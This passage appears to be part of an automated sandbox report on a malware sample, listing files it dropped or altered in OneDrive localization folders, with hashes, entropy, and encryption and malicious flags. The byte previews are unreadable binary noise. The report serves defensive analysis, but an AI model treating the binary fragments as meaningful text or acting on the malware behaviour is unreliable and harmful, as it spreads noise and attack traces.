Preview:	MZ............m..cCN.(.>.N......H.e@..a....K..3....`_?....]...+..l-...5g........4<..V..x.`....+..a2E.8..O...xyZ.e../=...e.L..a.......n...I.j.p..+....s........sl.A.h(M5...x.Fs.....F..$x..>.....S.......4.$E......v.1.G0P.]WD)s.....y..r...0...kK.-n...........E.O....A'.;.`..".z.0.=......D.0...............B...NR.'l..].kZ.FU...^~....q..j. ....6...-......I..`...d..9.C0...N.....x.e.... ...;o.].A..v.8.}.zJD.4...}... .KU!R#...Y..\$...X c...>.W...L...V.......q$..ySS4..%.?~L.....^W....0o%...Z..H.l..#...<T.&&:6....k#.Q.d.....y&P)Y.....CP\B...n....j@..PX...:........Ss.o....H.x/{.83..W...?..Dg..-~....+...UD1nZ..@..Q...._..lO.'\|]9`.9.b.O...@4._R]C.<..?h...0njZ..f9.A.Z.~g"ko...Q..g#.....\|.VB.....XUY.E>....=...Z.i.v..A.>i@.w.i.7.J.R........r...;L..PJ.}...\.=....v...+b.L.Jg./..v....x........b&.{.(....V....y...3.T...%".=G.....Gv.I+..v[G.5W\|..._.\..f......elZW.Wl...}.....=$s)/....%..X)<.0....:_S.z...i.........]...}WTa...._.+x..?.4......B"...`N..j>

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tn-ZA\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	183942
Entropy (8bit):	7.875921678962284
Encrypted:	false
SSDEEP:	3072:/oofqxfzZADw5HiYtJ2gd9yxrWazX+7y/NjGYSg7tLMR87AyFdNCKJKTcNiFOb:/gfzZwuv2gdwxq2U9g7tLhf
MD5:	780BF1936283A94F123D6A54B91161E3
SHA1:	9027CC2656EE855559E08D5B3807B49FBEDDCC91
SHA-256:	B9FBB06912347949B250F19FE5EF91F14B961AFA646F1191AE91112DA4A683E6
SHA-512:	2273D2E70BD97C7A4D966D2C2ACA08300F590BE0C2D77FA11761850E4C7E31B3183B352A04DD622D9D4DD6219444CB6305F64DB21D646A5CABA25E7EC119FB93
Malicious:	false
Reputation:	unknown
Preview:	MZ.....r3.`......2..T.A^1....-.Yk.."...]..).C.Cc...QRz.6....U..q.....~.:Zs.b......4..^5.71....FP.B.)f..QY.ik3...C(......!.."\|A..^...V..........E......L..w..j6g..Ka~...p.._..>^...^.j...V.....M._mzG...y..O.u.Vro..tL....a.{..H6....x.........I..M...j..J.C_...u.J...D..d.>.D....g..m>.hn.s.Dc.{7..].9.[.:7.4......X.....3...xIe/....a...-....!2.$7...q...'.W\|@}.@.:k.U........#..0....AS..'p.....U.86U.<.,.i....p.^.!.h\|.l.....J...-3m.n.-<U<6G../3..(d..T..C..c.....]..d....c...q.aa6......U......B9`}.Wp.Mo........n...P[U.k%t\|.9.$e....:.y.A...q.......=..9`D..ddEm.q..,...&.'.a...!"J..k?"%^}._H......#..1y.6.M].?..,^z.._....fU...[A\|.0o..r...M.<....K....W..'...oT.4NLks..6...K.U\|......X...,jl.$.]1....]....ol..xY.h...SV........T..]g....Y......+.5...4...!\nR.......G..hY..I7.C].g.......8l<B..aA\.....q....._I..+t..Qq.g.}.....i+..{P.0. ...s>...../.>.&...8Eb..,...f{.,.....s..7..b_0y..J.......LPu..85.IK.}.~\=..z....s.6..W<ywLm...i...'.w......6...a.P...^..uq/C.E.3_}.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tr\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	198278
Entropy (8bit):	7.7306461773846
Encrypted:	false
SSDEEP:	3072:Og8p4NYOVRXByCstJAImTAoxdTJ50IkdSlGrArTf5xScIsEcKJHYZ9HY99w0eAxN:OgVBvXByCszArEG5kdSkUX5xrIAL5al
MD5:	8C94D79326EA80E2270530B616F7F4F8
SHA1:	ADC28CD43F3A4FF05DCA087DD0A42C263EB101D5
SHA-256:	76FB1826F5716CD414C3905CC2764B11D3905930A190BEB7AF67707C91459FA5
SHA-512:	DA1D047A66F86AD9253A5EE78654B2CA7C00856B882F4B65D8CABF4431D86D4AFB86FDE2A1A9E37EEC3E4A3D2CB226D696E7485F801785AEF860D14BDC346682
Malicious:	false
Reputation:	unknown
Preview:	MZ...q.=....NO(y....K..1..6......;.qvoh...8.....3.an#...k...j...R[.4..(e.....?....6.x53..\|..$..(..dt..."...A..1L.........a,....x....9...'...f8~O..G....).\|....Kt&..a..I....+.~.yhB.v..0....T.-.i..f..].Z....,.h..a]?....sg.t..N...n.+........7i.9.?8...oc..fk....!...Vx.vI.J7.X..Dy.dw.@......i....c>.b.N...w.M...$..a,Y\....su.Gk.B.n.~32....jt._!.m(}.pG...........]5..CK..{z."\|^-.N.8.%.X.W.e.....qR.b.~.....d....&.z].I.sR8.lRo..U.....Ee..,.RX...=..`1..8~0....'.E[.`..Q....Su...,..............G.....&.zi].m.......Q.>.I..{}......6.........8Q4.d.~J...6..gf......~.w...Z.P..oC.#.c...O]gV9..Bz.n&'..,...Z.^k...Dx3......:.,.o\|DX.8...p.......nz.h...:`8..}..Y(...S.qqj.....I82'.ZKC......%...\."2.F.#.W.... .y.>O..?x../.T.=...K){.Bij.....F.W...&@....].U...1.^.."..7......."....G.P.;.q..cY.~..7.......>...N.$...)...............E.........1..8..l.n^t.).27.AQ..kBRm.....f...8..k...0.........*1=k.........c...../.D`._^.Rj...Akq.nB..M.....Sb.3.t....f...61....o.%.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tt\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	202886
Entropy (8bit):	7.730358812205282
Encrypted:	false
SSDEEP:	3072:akGm/PI315dx3soO779nA8kzm3oFCPuGQsS2Ri7d0oLNROFDL9f3+s:vRPI3tx3soO77Vjkzm3oA62k7rLsYs
MD5:	FA064F8B99B5D82DF89E1715CCC171F9
SHA1:	0E3622F94BE5418BAF6409AC8172A105ED5F20C7
SHA-256:	3B9A7248D5F51A989D8CA21EDDEA03B5E556648C178E594AADF77658882AFBB7
SHA-512:	651017A002E7287875244A0EE1339769123399A3ABB158ED04EB5CCDC9A3DA1AE746D15C5BD115565C0CCB7E84F6BF36654EBFBDA64D7F0BE5A56BF359CBABF4
Malicious:	false
Reputation:	unknown
Preview:	MZ...g./B`.......1mrei.\..T..?.o...; .I.=........&...OCYh..6.Z..H.........l...j.O..=i$..v.}+...M:d..9.0..Q...#..+K..t....T....$..Z.........P.'.......`.(-.$,B.8$af..{..a.1....Hyv)n.!.su./4....F..#.`X7b.^-.o......MG..\|.aqXZz.v.M.....T......w12.ws].......1...F...[.......G..tw.A..8..2...6^c.....x:.t........k.@[d%..T..p..XQ..T..].......5....=.F.KT.`A......b...loI3^.Z...z....k..N#.vw..X..7..9.A....D....p.H4.m>....>0Q.'.......z.0..zm&<4..6!....)...R..T..e.....J...:/....9....y.0.[.....x...RH...ug.^..J.z.;..-.x9k{..-.Q.R\.-...2....>..{...-.I;...:...p......z.0C.....\|.......0.l.X..)%.V..+......6...uO..'KH.@...\|.k\|s)..t...8h{....3.,..Z..\.1n..-z3.&...3.+..}Pn..)...R.s...B.=S5...'..'={..k.[j..L..V..z.`_z..e.4;.e..!.}q<..R.1..@W..e.......1.@Y..s3.....KQ.wj..$..L(.........Ma.......B.}.....#...+..u7.<XM~v..-h...,...h.z;..m....T.9...Pg...<H.[...u}....L.)..$..R...Z.Q...B...-C.I......08...w.-...3..F...u.......Q.IM..9../...u....6k.Q.p....

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ug\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	188542
Entropy (8bit):	7.86372865352332
Encrypted:	false
SSDEEP:	3072:NXkQsJavROq8/UEdT4Xh/4+y9X4t2DjnmFQ0oGA9WMq6q:NXk8c5cM4XhADXj/Er1A96
MD5:	FA1119EA52E30C2D8046DBA141C08D7C
SHA1:	901D342858C6B639BCB5A2B081BA750341691DD7
SHA-256:	E0695740563F771706FB243DE2EA362AF3CEC564B6AD47B5A84136FBA596A7CE
SHA-512:	B32CF8EA52C58D801F135D5290BCE42C0BC307951AD09B58B07B990F74A0C04E398C70BF87D5A103FEED0D67AC6B64B5654DE293AC82BBBAFEDA27624D18ED45
Malicious:	false
Reputation:	unknown
Preview:	MZ.....A....O..:..v.X.N.F.:E.~..w\|..V./..f82; O\..qP?...p...O..g...o.Xh..j..R......+...?.}}6..>.H.I.....n.<..t.YPnd... .%P....)..F.v.:...~.)..yO'U].....p..g(}K. ..i:.{..I.S .].x,...<6I.+{./..8.B0.hr.`.}.R.:..(........'I...:I5=F!5.2....E..L&&..h(..h.9..+md...........yj.>.9...s.~W..o.-.;>a.G0bgEo..8....4wA4.......13ce..:....(qjt3Ev.&5W..9.....{.&..O...c'....Z.^H:..5..n.B...l....;...>...zh.wTOQ.... ....=@...4....%.~..q.kC9.wl.;.O......3.7tFE?.V..q...b.+/..$..?[.X..R....p...^.\.L....#.R@....S.ymb:..G.#`4w...W.}....FXw.4.1+.+$.A.).I....)w.....:e.'.../H._.Q..<.x.{.'i.O.lYf.....,3.d.?....8..C./ES.2a.".... ....B1W............Y`.1c../2..K...+:....8cu..5..2........L.BT.g...'..(.{a........\|.......p8.Q.D........a[@.....+.)..2z......X..#......S..,.c.F..\|O..G$..}...x...u.&.."ss^..O..U'.5..$p...........45.5S.........!?M.....";.....6..D.......I.C.7.V........zc...._".n..0[.Q.....F..x.......d..{\|7I..R.3."..YVPqq1.gm..k..]oC#<IM.[/.....=L......[t...e

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\uk\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	205438
Entropy (8bit):	7.707476453859148
Encrypted:	false
SSDEEP:	6144:Q1j5IEQtWH8tHe6/q3jiusPO4412eAAGO:Q1g8H8tHUzR1/Ak
MD5:	D38F325A58B72FBD24FF89A30CA4BBBE
SHA1:	E061E91F3CE87B8CBC9DCF9EAF25158DCD6097AF
SHA-256:	C76B46379C954FBAEF495EC29A11472A904FB77461CB8683EEA71FC7A3AFD882
SHA-512:	1601F2169F4108969762E379E3CCD4508C579F63B76C5D92C78DE74216879A33D016F4BBF1E34234F0E8162BF43C0AE5CBE4B35733FF5F44811301B325DDB81D
Malicious:	false
Reputation:	unknown
Preview:	MZ......K @{........^...V@....A...u1..7...B...~i.q.iy.....1...r.N.....j..w...^{.y..t.&........smg.3..{...+..`....3..qb=U..+.,8t........~..?..t......4.Ee..D..M$.-J.bD...[..W...;.K.k.'..QV@.?.$f..j.v..P...L.....kE..........N.R&.Us.6........\T.o...3H.../v.P..E..D0....."..od#..'..~....n8uZ....)`.<....6.... ..5&.O...y..H]@...2..G.......[/.rqO.x.6* T...t\..m=$.c.>>..\|[.b...m.^...kc.......K.4#.%.W........o ..`.UL....s..j0n...H?.....w...r...N4.:.S....)..j...#.8.#u.+......;D...W.z.v..........5......8cs....5.....L..,^.x...x..S.j.-[v^9.......L...!+CF.Lk..a.I..w{....:v,.V.......hh..{q.../..c.,E..L..~M?'.D^....n.........4..2.D&..+.C..E.z...bo..w.Kv......!<.n......^.#..V...%........6J..A..5y..Gl$...\q8."..t..v..n...j..>..H.\|..,.f..f[..U..`.......&m..D........+U..]]..l...]m4.......Tz.-l.z..:A..p...X...e.\|+Z...S...).e.B...An......_.X....X......Q.aB... ZN.g.;.u.y8.KT.E..C...>KO.,.$.#U....</.,..V.....%R~ ..........<...'..c.h..`..I.o2.+T....*j....

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ur\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	204414
Entropy (8bit):	7.704736071560464
Encrypted:	false
SSDEEP:	3072:q8ftseTzyd4o2z0kYUUFd4tVA5Rfvy/j6J3GVxnwotlL2ZMJ0hN:/WeTzyd0dYUUKI876J3GVx/cZME
MD5:	11B66716F87D9E93CB6D6D3C766EC6FA
SHA1:	CE1E9967E7DBE50EAA0A9F4FB07825E75EF902C3
SHA-256:	20F5A22311751A94CB343FA822D8F09A7CDE2D06ADE3F30A65DED140A9D2F615
SHA-512:	FE2862B197359E99FF82592F96A38BC19DA7A0925D431B3C2323CD36FC58C5FB007B0B62AD96FE917F2C0C12877636F1615F2770A4FD1E49513E7E92DAC32B1C
Malicious:	false
Reputation:	unknown
Preview:	MZ......D...w[..#..T]2HrxHf.j....&.>.........6u$.G.Ge8Z3..G.b...'.]...6.0..M.....L.5.zZ.i....Jvac....xm..A..Y..uv...2.(..c..b}..i...4!.4P......g..G.u...7.....VR-b......v..b...Jz`.l..\b.".J.....1.O._.....mM..k?..&...PxK.H.1..e#.........VH.C./?3\...mg..6i..Q...$.........(.^~.......B..uyn.....X....6_K...BD..1..)^.8..e{b.%.}pC.............h...;5k.(#<6.9...3.x...)..\.m....m.......V..2..1....rF6..O..B._\.9.:..0N....!C;....Q.d.A.2.s)..<..u..>.9.kuZ.fZ8$f../..q.......~..6..H...S...v.#.....GT..w...eN...{.W..._......a....D.!....&...8^?P.w...-....n.$d..8.ZS.x.....2..Y.,..z.`..@[...V.;\|......!P.xo.....'.t...Uj;.W)Z...C"..O@_.Z..[s.....0....u.....i.q!D....s....}..q}."D..o.m.p.m..'.....A....t.}.T.!.Ymq..s.j..-.(0Q...~o...4........+......0.>.U........`~...=.y../.}"Q.E.....V...q....qq.c.4.a.....G....2..fQ.....%....P%....>.n...Qr...:...:.;A6..(.......K..a.J..p^...r.N.a..\|.nR,.".Q......-...k-.....SZ.qqi.....t>2....Id....S....<.QwMi.$....Z.).

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\uz-Latn-UZ\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	205958
Entropy (8bit):	7.632194038180261
Encrypted:	false
SSDEEP:	3072:9ZYd9RvkGknEn9j8Bg+pOjhYCbYF4AY7uJXmvaJOIHOJxK/1ypFrtWrydjWmy2:9ZY/RvdkEn4Oj5YFzJdOeMKStWryL
MD5:	A0CFA0E4EB4EDECC95E6FCF8F053CEA2
SHA1:	2C9524976C9C5CD9F90542DEDEC24DD0EAF482DE
SHA-256:	670A9B67C48CC5F0D0536F81CA624421835DCC4E90510E8E7E5BB8AF72BEA7AF
SHA-512:	2E6630B741ECF9F1076C76648A0022880ED463A57584A27A4FB979BA4C084FC21E389AEFB2261045A1C0445DC0C1CC8DCCC0E7E55EE3D6633FAD3DC6F170B93D
Malicious:	false
Reputation:	unknown
Preview:	MZ.....9.u......n]..o.L.';.=.....D.....M......}...64..B3....g..d...Z.....C...-..@$H..5..1...Bc...s.......ya7..c..I.....w..).D...@U.o]........2.N.......U.."..j..C.....,......$1..:.~e..,..D....."..'....2......+..9~3{...<.........\|.K...vl...M.'VKA.`...%d<_....=\..=........%.....p..G5.P..=..6L....<G.....?/..~.p.........e?....".!..u%$M.+...p..5..5F..W.(...G)Pc.=c...2...+3#.O.}..c=....@......B..!.f..w}.FB...{.......8`..M.]......+....=.f...."....?..i.\........j..d.J.xC.V...Y..J.7.....-..P..O.uZC.B.....oZ:!.7....O7..I.Omg.RX.........P.....4av....6VxW.=.H6H....h&.k#W.n......J8....._.}8.c?]?.B...\|8..P.N.\|..+[.../..v..=g..}Y....`.\/k.!.2.a..6...W(.^...(....:.S......U.P.0H.....a...g...\f.+..@.5(.A.%.....{......-..l....-....e...B.;.S.<9.....Ur......e.mJ...B..M...A..804@.o..i.7.8Nk..7.{;Y7....@."_%.v.2.6.h......3..i...y.n.<C2...!.+...E"!.....i.5..._5.o{..t....p..L._.T./..K........=.\|....H..R.9.F.:n..i...@J+..8?.w..2.4.....3..v[{..%0..).>&M.xN

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\vaultIntro.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	12465
Entropy (8bit):	7.982487798777959
Encrypted:	false
SSDEEP:	384:Hi+xHZRHVbhpTDmT3s7810TWh4zQVa4S6VCT:nxHxhBmTca0T936ET
MD5:	5BBFB601FA0D0C756C4FCA04EEE13A32
SHA1:	9C6F7D5BAD7BC021526F5B1EF68BB052906E23CC
SHA-256:	3C1BBEEEF1DFF39DEED58A7357D783EAD0DF19EA27A158F79AA9A8B0C0A2D5D5
SHA-512:	0F00BC07934FEB20155049DD532287F683B5C818052D0B9B00C9AFADDF1504175C23DBDCE376DAF704589A368C64D8534FA43744985CE0E5B5DEDD4B4D046F7C
Malicious:	false
Reputation:	unknown
Preview:	.PNG...0.a.\|zyq....&...6M.J..H.F...6Z.!.p.]H)H1...<I..Q...8.....p...z..f..@.-....V@~..bm(+.M....<..8......9.....v......ZfO...3P..(.)..i..LR.E{...Z..gu.>.....?0.A.T..V.8...4].t....:II.'..gu.._..a#$lv.2@.@(../#>.pM...W.P@.F....6u.NT].......vP......7^..B....(.P..8.X.O;.Y.....9..UX?.3.../.u...g.r.4.c8{\....p^.,.u..........qSZ.p..^h......v^,.H..x[-.$.`+.zD....'.+$V..k.....<.Ds...v(.wRK...^]..........6.y^.O.F..(.Ij.c..&..p....7p..fVM.^..B.;..+......^.o..+....X.Pdq....L..+.3...........8....ze.<9..z..uT.3G.O....P.T.\......P..9W_....SJ..K......_.}.........\|>..eAU..._......d.aj`^...q.}.t..U:.[7.z.....s] .?G.U.~/'."E.v...[aj.....{S...74cki....r.j....h........L...._Z.+.../.....r...,`b..D...Q6ToD...q.....$n@.zr../...@..C....t..Id..{k.;..fs.4MKr.........PI..\.....2.y.fM..L...=..<0..$,..^.dxoU<9nE.~S:;n..b.Os......n+.....n..6&.Y`.[.<*.<n...Y..k..........HS0.....v..,.~.Ni...o.[6....)8-.}..9......TJ.Ik.....P.....Y..k.2D!..0KZ..%.6..zN.6 x...Y

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\vi\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	196222
Entropy (8bit):	7.7746784558743265
Encrypted:	false
SSDEEP:	3072:wsH6Jmj9o5gCW8qbIuTLb/+4e1lMIIXVb8aNMiQZFhAxR4fdLt80f+9+HubR/Ot7:wC6kjkgC5qMuLb/0zX58Mi6aR0dLy0fF
MD5:	A3E2CBD6DA6819CF323E25FD773841B4
SHA1:	7DF0AD08C903FD835FEB040B427BC5A212A7315A
SHA-256:	D3FFC071CACD334425FFE6CF0ED58090406E9F80E0B57AA829362E694C04C4D4
SHA-512:	A9209A0B8C7123DB6E9D99D65503E722C6A79626AEF9FE63659437ADF1517CB3086B6E66E06959C636038473A16029817B507DC57CD739BA437FC7EA49CB7A7C
Malicious:	false
Reputation:	unknown
Preview:	MZ.......EA.L\|sM~e.%cy.%%..4....T=......[..$zs......(...........Q ..;R}qvh.C..0.....<....{.q....E)....m.g\|.....W.L.....8.a..."..v...p.G...<Knx.O.$.'\|....+..].d.U.F...uf.D.K..f.j.G..i.....V.~h......F&.f.Jh......38.h..nh~...L..v..Pp...f_.tF..!...-...%...j.c......M"!Gb... .[.Uw..OJ-..:.. .....>...A\|M.UH..r......9.Y.;...q.ty.5.\|...`.o.<k<..>.l.gX.........+...V...(A\..../b... %w....ga.....p..8..vL.J...A....h&AN.......S/.v...L."?...<....>...`r....._...+je.u."..E....8.`u..p.E=a..".+..^..I.8.X.....q.H/....4..z.uOL....B.:.....mm.l.3.tbf`.%'D)jA*K.B%..\.../.. /....M.d.\z...i.:...A..#w8..U..A..B.q.......}" ...q..y./.;{2..v...k........v....P2....\....=.G.H.._.....p.=...........7'_C.h.0./..O2.......Cl...A..4.s......G...)...?....K...z..}.G\....)....s....8..xH"..wb.XYY.s..7.@;...x.Z..$.W.4.E... .(.].Ylv.J..8..&.../Q.9r.Rv..gdI. ..U\.......T...\|....Cs..{.eo.j..\| ......As..>....&..S..M..>..U.8......."..p..O..9_V.px...J7..b...w!!........\7.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\wo\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	146054
Entropy (8bit):	7.99869275520774
Encrypted:	true
SSDEEP:	3072:lcG1ljbsS20Q5mt7PrZbGa6kdrdGtZcITImFuLdGQGW9nM046Aj/:vgiQ+PrAa6gRGtZcIBGGCnib
MD5:	75FF4150C2C50C5A6D93AF9DF17DE71C
SHA1:	E83C3611E5FD90EB6CC08A2FD30284BEC5DC3799
SHA-256:	9D16B0A7809C9CB9BB14474AE6D30B1ED61BC2B3191A2125EB15A4DF4E566FDE
SHA-512:	4D667742AA0F17A0E9434149EFAAF1603D91EF0426AE3F63942889F620A6A4E4CF6B75B84C954D8D8B639150DDCB0B2F6F4A29C75DE168315257E2CE9A9314D3
Malicious:	true
Reputation:	unknown
Preview:	MZ.......M.T..VF....+..l.0c..q....A+.V.......4Fn.....U.Q........{..5.._.....;.........H.(.........D....H.!.....;.......+.q&e.....N.i....#.(..F.....K`..K.'......1%S.o......"....{...l.V[._mJ)..Z....j.$W..T`...w.!....~..}.I!.ap#..-D3.6{ln..q.q.d.O.<.4.#0.O.U.w!:Y.....\x.wR...O..a..(.7.Q.1T...5.......c.S.}....r.]...g......$.0...y..qH...t.c.M....B.i.(....D....k.w.....c........#...Bx..K-.Q..s...c.....r.Y+....Ht..LV.....S.Kr.......Xi.O:/bf(..tD..H[.r.$..PdG..zg..0...'./...MS...jJ+)Z.!........R..)1..`..._...j&..0.....8.h.i.Wc.e.`......;.\.{.4..7%Z........3V..C:..N.3.&...+....n.I.!$...M...\.8.P..v........i^[7...V.F..6B.8..Zl...D....r&..!].....n...%-..r..}..(tGL.T..r..0....d;..En.]a....Sj."...~..v..\|..N.Sx.#..A..{....=.q...Z ~.e..b..8..r....;)........S..8..C8...\f.W.%L..........!.y.#.}...-.6....d.R..c......%q\.2...f.....,.....r.I{.....gF3L+..2!..!<..M...g....C..r...d%..'.E.nx...*.p.,.(H2s.<jR.....c...(~.U...3.7...AM..F...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\xh-ZA\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	162430
Entropy (8bit):	7.99562488860095
Encrypted:	true
SSDEEP:	3072:Q+WaCGFjDARbTiRMdBnwcSnV4z8Dfvon3FvXHXDCN5eI8kUoAs1kvPvK/72:Q+Wc5sbeOHnwceV68DfQ3hS5VAsCK72
MD5:	FEB61EA45C8F3B9D87FDEFA98F80F27A
SHA1:	4BAF21139687DF0817FBD6EFE3E745E7E18C2FF8
SHA-256:	4DCD8EE85645DC5E95AAC6C88CCBCEDF0FEFC869C088396B9CBF7D1109F12E4B
SHA-512:	BC5E72AA7291D4135FF842A72F0FF06D3826CB95A07C1861AFE46F9787CBC1E61C7EC79732FFA7E1C317EEA29BF1181AC2478BD577BDAE164A12D428D00560DA
Malicious:	true
Reputation:	unknown
Preview:	MZ...%..."@$..hz...v.s..$...8'$.....Z.....S..WG.S..b...P.^..<...h.6.!..#...o.S....]'..........r...0Hi....7=3..}...9.'.L.].[~.D.\....2........t(..(F..@....S-.&..>.%e.9)....[.X.......}..:>.;.3...v..........hx...Q......'U?.........4.N..O..~/...NcSh_..?...(6A..t..x!.uP."R....`+&.r.7n0.......m[#,.g...EO.8q.....2nY....Rk........%4!T. e<L.H"...;..h......_..(z..@{...8.L...w...a..{s..B..P5..Q...........N.#.<G.yQ.-..W.....!m..tv...O.,.......h......ehR.}...+........7.>.h........[..uk#.u.z..X.G..i....JN.U..a...Y.i...Gn.^....3_Z.....UD.'#(.N.4TQ..l.y.....I.....P..I.rA.....o.....2Ot.YV..x.....FL.....{..W.ZE.I`7..A.......{...@..-J.z..'y...4C.%.z.>w.r......#._.....OnF.........O.Q.D.vT........)......1..mP..2..F.....g..#I.n.Y...gi.H....rw<[.m...3+-...,..... M.:&3..8%Zj.....5..q..kv.rb_.......G....p.m..!o......2-..} +.p{._/...!...A..w9Y..\|.K.P.K\..G....)tt.~N..+.MX.$nv...=../..y.../k..)\|.K..'2@...k......{..,..B..Jj...^......3/Dy.u./....$)..y......\

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\yo-NG\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	156294
Entropy (8bit):	7.99826078230089
Encrypted:	true
SSDEEP:	3072:w32RbFyYhOKPrd/9NQPmzb/g/4GROJpvNRORQtUQAc12CxmsbO+:zIbKPr19Rgw5ZnUQv1HxmoO+
MD5:	15BB640092BF1B72EB6F7953AE378241
SHA1:	A7759F9C9005501BDFBE42C34A9CE4C7D7BAF74D
SHA-256:	AD27A031ADD950340044268DFD6927AB02638BBE1FA225B8F8D8F396CD5F2F9B
SHA-512:	3EF6C9DF2F1A9659A856D28E82CE20C9D5892ACB79C5A134CCB48CB029DEE7486EC79BCD7F08580E8CFB8734BFD6DC94D8EE6B1F41662AACA9D02976DEBCD91A
Malicious:	true
Reputation:	unknown
Preview:	MZ..........@...7..e....n.C.rm]X....t.(......+.#.?.>....F.S8...,....v...f....P:...;......Y.de:..!.:d3.`4...n.Q...HH.r....0.)-dG.U..M.#..u..wa..u...........Ic....Z....d$tk.}.r.7[..^..E+.....4-m.[V.+..2.].....Oe.\D. ......u.8..;pC.]..g.{.>D....g{J.Wub...q.5.J.'.QW...pn.<....].#..r...c..~"G...[..A.p..Z.T>.......,A.l...X.0.%.....u...UH...:.....r>#IvY..A.#QHf...9g.'....E)....<.H..h ........)..:8o...u..NL.\|..<.L+g.IB.f.f^!........y.h.h!'Mx3.=.d..C].....T.=.<....,.P....u..N.....S.H}F.....>g@m..@.....gI...@.x..../g.u3......up...!...^.t..'H.QV...6..:~-.V.......\|$...J..\z....R.%...}{..o.wn.0..HF....'.>.s.>.w...nVD.^...\|...#....-.\|@...q..c..j.6..i...]...Vc....z.C.+.]H'.c..Y\|.g...#..~..rb..u.dS.`.gG&..9O.9.^4T.+aG.,.Z...t1f8.....2.l"E..^.d+.4...}%...!.qO..F6N....Q...1..@.....$+[."?#Z_...@.....H.m:...p....g.."(...7Zt\..~o..Lz.Jr~)'.^F...s..@"X.4...o...`..5v.d.....^..b.T(..#.K.J..9p.v.D.*....}M./....j...h"........%P..+.L.&.......J...3.R.{...t..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zh-CN\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	94342
Entropy (8bit):	7.997963203182417
Encrypted:	true
SSDEEP:	1536:nkjqCgUYe44T9AxbTQMkVHwNKQ9t2DRS2pLbFBwlQ3reFGCJo9CqhiQ:neDnAxKpQ9toI2p5iwCC9thiQ
MD5:	7B35AA1947E631788EB543F9A25E9DB7
SHA1:	8821C0EF28016C10A118F5EFCEFE01980CE7B9F3
SHA-256:	B887260C90583B5CC373D7A9E6D4D01F8FE2BF8B7C51B2585D876812F936BFEC
SHA-512:	346BFC5CF12521D5FBB4143D649AEEF8022ED79B7659CA466F4138A83E13D8E512C7B1A40C4A4C9B8B899970FEA52CEED2B04AE156410E2B80CB07DA37AF2ACF
Malicious:	true
Reputation:	unknown
Preview:	MZ.....v&/...}...mF>..:...$...K..+7.".......'[...U.....4(...=.sc..........)....O..%.dN.l..FM...........a.`...y@Xo.3.>v..iHV..I.....ge...E.q. ...Z......1...Xj'.....y...[S[...T.T}..9.:_.....\>O.+..k.,.8...uo.. ~..&E.tN....No.#.T..$.[.....J? ...-2..._..3.M./.'S1.P.w.r..t..-..u.p...(.EJn+..SYu..F...$\|_.63...X.\....7..l.\WT.....H.q.oJ...........).....p,.....:.....K@...&..."..d.o......}.%v.L1sx.W.~..O..0....~..V...P.]S....fA_.QQ;......7E.....nL.w..Ad..}..5x...l.9.IX).C....eP_......2R"?...5.)^..{7=....w.........,.4.......K..f<.4$~.u.J..5.W:..c1>..l.g...9..#..@..G..jP.!.. ..f..#.[...I>...ro6.....2.......X.Mef?I.D.`.UXL..zK...BG.R`5oIu...}.u..m@.6i.P;..O....j.5.F.BW~.y....pC.n~=.I9...g.P.q..0.:H`..R\.!nl....8..1k.%G.(.ht..V_....Ol.../....x..5..a6...f.....u.9._ .....'....^...(...S..0.......Yx......d.....~.px#.f..Rl.....s....re[...0.KKf.......\|&,..j_6....w/..K..-z......bHHB2vE..LfS..5.z..0..`.L...o.>....."..BRn......_.t.9,....~._t5<.Y...*...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zh-TW\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
